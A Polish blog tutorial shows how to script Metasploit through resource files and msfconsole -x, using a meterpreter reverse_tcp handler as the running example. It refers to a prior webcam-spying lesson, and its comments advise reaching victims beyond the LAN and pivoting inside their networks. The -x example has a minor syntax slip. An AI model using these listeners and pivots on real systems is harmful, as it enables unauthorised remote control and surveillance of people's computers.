Msfcli w Kali Linux 2.0

W jednym z poprzednich wpisów tworzenie payload z pomocą msfvenom wykorzystaliśmy specjalną aplikacje Metasploit Framework o nazwie msfcli. Służy ona do wykonywania złożonych poleceń pakietu za pomocą jednej komendy terminala Linux. Niestety w najnowszej wersji systemu Kali Linux i pakietu Metasploit aplikacja ta została oznaczona jako przestarzała i wycofana. W taki sam sposób kiedyś narzędzia msfpayload i msfencode zostały połączone w jedność o nazwie msfvenom.

Na szczęście autorzy pakietu narzędzi dla hakerów nie zrezygnowali całkowicie z pracy z nim właśnie w ten sposób. Dzisiaj zaprezentujemy trzy ciekawe sposoby na wykonywanie swoich skryptów w sposób zautomatyzowany podobny do konsoli msfcli. Na końcu tego poradnika zamieściliśmy film dotyczący poprzedniego wpisu o exploitach w PDF w której prezentujemy dzisiejszą prostą sztuczkę.

Tworzenie skryptów msfcli w Kali Linux 2.0

Metoda 1 – skrypt wsadowy Metaspolit

Pierwsza metoda polega na utworzeniu sobie zbioru komend Metasploit w zwykłym pliku tekstowym, a następnie wywołaniu jego za pomocą konsoli. Zaletą tego rozwiązania jest możliwość gromadzenia sobie takich gotowych mini skryptów w folderach a następnie wielokrotne wykorzystywanie w przyszłości. Osobiście często używam tego skryptu do tworzenia sobie uchwytów połączeń zwrotnych typu reverse_tcp.

Przykładowo utwórz i zapisz na swoim dysku sobie taki plik:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 16666
set lhost 192.168.0.19
run

Teraz w celu uruchomienia tego programiku wielokrotnego użytku wystarczy wydać następujące polecenie w terminalu Kali Linux:

msfconsole -r skrypt

Pozwolę sobię tutaj zacytować dokumentacje argumentów pakietu Rapid7 Metaspolit Framework:

-r, –resource FILE Execute the specified resource file (- for stdin)

Wszystko staje się jasne, parametr -r służy do wykonywania poleceń z standardowego wejścia. Pamiętaj, aby przed wywołaniem skryptu znajdować się w konsoli w danym katalogu roboczym.

Drugą podobna metoda wygląda następująco:

cd Desktop 
msfconsole 
resource skrypt

Najpierw przeszliśmy do katalogu w którym znajduje się skrypt a pomocą polecenia cd, następnie uruchomiliśmy pakiet i wykorzystaliśmy polecenie resource służące do wczytania szeregu komend z pliku. Cytat z dokumentacji:

resource Run the commands stored in a file

Moim zdaniem przy bardziej skomplikowanych zbiorach poleceń występujących po sobie, jest to genialna opcja.

Metoda 2 – wszystko w jednej komendzie niczym w msfcli

Drugi sposób zakłada wykorzystanie argumentu -x polecenia msfconsole.

-x, –execute-command COMMAND Execute the specified string as console commands (use ; for multiples)

Przykład tożsamy z metodą nr 1:

msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lport 16666; set 192.168.0.19; run"

Przy wykorzystaniu tej metody pamiętaj o umieszczeniu wszystkich komend w cudzysłowu i oddzielenia poszczególnych średnikiem.

Alternatywa do programu msfcli w Kali Linux 2016.1.
Powyższe polecenie jak widać wykonało wszystkie komendy podane w cudzysłowu w poprawny sposób i rozpoczęło nasłuchiwanie połączeń przychodzących na porcie 16666.

Naszym zdaniem jest to mniej wygodny sposób od metody pierwszej.

Wideo z wykorzystaniem komendy resource i parametru -x

Poniżej przedstawiamy wideo poradnik odnoszący się zarówno do dzisiejszego wpisu jak i do poprzedniej lekcji na temat zdalnego podglądania kamerki i exploita pdf.

Podsumowanie o następcy msfcli w Kali Linux 2.0

Jak widzisz wykorzystanie tego typu sztuczki z wczytywaniem poleceń z zewnętrznego pliku z komendami może być bardzo wygodne. Ja osobiście tego typu kody źródłowe, skrypty i inne dziwactwa gromadzę w swoim prywatnym folderze. Wszystko oczywiście racjonalnie opisuje, aby potem nie było problemu z znalezieniem tego czego potrzebuje.

Jeśli obejrzałeś dzisiejszy film dołączony do wpisu to oczywiście warto prześledzić poprzedni wpis na blogu o zdalnym podglądaniu kamerki internetowej. Warto we własnym zakresie również zapoznać się z podstawowymi możliwościami programowania skryptów powłoki Bash. Można właśnie za jego pomocą ułatwić sobie Linuksowe życie. To by było na tyle, pozdrawiamy! 🙂

9 thoughts to “Msfcli w Kali Linux 2.0”

  1. Witam. Pytanie może nie jest na temat ale stwierdziłam, że pod najnowszym wpisem będziecie częściej zaglądać w komentarze 😉 . Mam problem z zaszyfrowanymi plikami przez wirusa zepto. Z wielu artykułów i komentarzy jakie przeczytałam na ten temat ostatnio wynika, że do tej pory nie stworzono programu, który jest przeznaczony specjalnie do złamania szyfrowania tego konkretnego wirusa, a programy do podobnych, które ściągnęłam nie działają na niego. Czy moglibyście polecić jakieś programy do łamania różnych kodów czy haseł opierające się na porównywaniu pliku zaszyfrowanego i odszyfrowanego ( mam akurat trochę takich plików), które mogłyby dać sobie radę z takim szyfrowaniem? Nie mam specjalnej wiedzy na ten temat ale może znacie też jakiś inny sposób, więc jestem otwarta na wszelkie rady . Z góry dziękuję i pozdrawiam :).

    1. Porównywać oba pliki to można i w Wordzie za pomocą bodajże recenzji, słownik wygenerować też prosto za pomocą programu crunch. Napisanie do tego momentu aplikacji robiącej obie te rzeczy jest proste.

      Pytanie tylko skąd znasz i weźmiesz algorytm szyfrowania i deszyfrowania zepto? Bo żeby sens miało porównywanie to najpierw musiałbyś znać i zaimplementować algorytm zastosowany lub wymyślony przez autora ransomware zepto. O ile samo usunięcie programu może być proste, o tyle odszyfrowanie danych bez klucza szyfrującego i znajomości algorytmu jest praktycznie niemożliwe.

      W przypadku innych starszych wirusów typu ransomware, projektant ich popełniał błąd w implementacji algorytmu. Laboratoria badawcze firm antywirusowych miesiącami rozpracowywały za pomocą inżynierii odwrotnej kod maszynowy wirusa z nadzieją że podczas implementacji szyfrowania programista tworzący go popełnił gdzieś błąd umożliwiający wygenerowanie klucza uniwersalnego.

      Jakby kryptografia nie była dzisiaj skuteczna, to bankowość online i sklepy internetowe nie miałby racji bytu. Porada na przyszłość: twórz regularnie kopie zapasowe na zewnętrznych nośnikach.

  2. Jeżeli chodzi o algorytm to już na kilku stronach spotkałam się z informacją, że używa algorytmu RSA-2048, choć i tak niewiele mi to mówi. Niektóre moje pliki dało się odzyskać ale nie wszystkie niestety dlatego zależałoby mi żeby jednak odszyfrować resztę. Uzyskałam informację, że prawdopodobnie dałyby radę programy do łamania haseł dlatego się radzę Państwa ;). Czyli krótko mówiąc żaden program nie da temu rady i lepiej zapłacić okup? Pozdrawiam i dziękuję za tak szybką odpowiedź.

    1. Nie masz pewności, że płacąc okup klucz rzeczywiście dostaniesz. Ja tworząc kopie zapasowe pogodziłbym się z tą myślą że, dane zaszyfrowane=dane stracone.

  3. Witam, proszę o którą odpowiedź lub rozwiązanie (link?) problemu w jaki sposób wyjść z tym poza LAN. Bo prezentowane sposoby powyższe dotyczą tylko obrębu sieci pod którą jesteśmy podłączeni jak i ofiara. A jak zrobić by wyjść z tym poza obręb jednej sieci? Próbowałem wpisać tam moje zewnętrzne ip, lecz wyskakiwało „Handler failed bind to IP:PORT”

    1. Dokładnie tak jak piszesz, ale musisz mieć publiczne zewnętrzne IP takie jak np: serwery mają (często dodatkowo płatna jest to opcja u usługodawcy co miesiąc). Wtedy albo podpinasz się bezpośrednio do sieci Internet bez udziału routera (Twój komputer wtedy będzie miał zewnętrzny adres IP, a nie router) lub wykonujesz na routerze tzn. przekierowanie portów (port forwarding).

  4. Cześć. Zakładając ze uzyskam połączenie z komputerem atakowanym. W jaki sposób teraz przeglądać sieć ofiary? Np. Wykonać mitm na komputerze w jego sieci? Jedyne co mi przychodzi to uruchomienie jakiegoś portable VPN. Czy metasploit ma jakieś narzędzia do tego typu zadań?

    1. Poszukaj pod frazą ProxyTunnels metasploit. Tworzy się po prostu połączenie zdalne tym modułem podobnie jak ma to miejsce w VPN, następnie za pomocą zwykłych narzędzi w Kalim pracujesz w zdalnej sieci. Metaspolit ma wbudowanego też sniffera. Polecam wpisać help.

  5. Mam pytanie także nie na temat. Zacząłem hakować w 2020 roku i nie wiem jak obsługiwać tę nowszą wersję. Gdzie pobrać kali linux 2016.2 ?

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *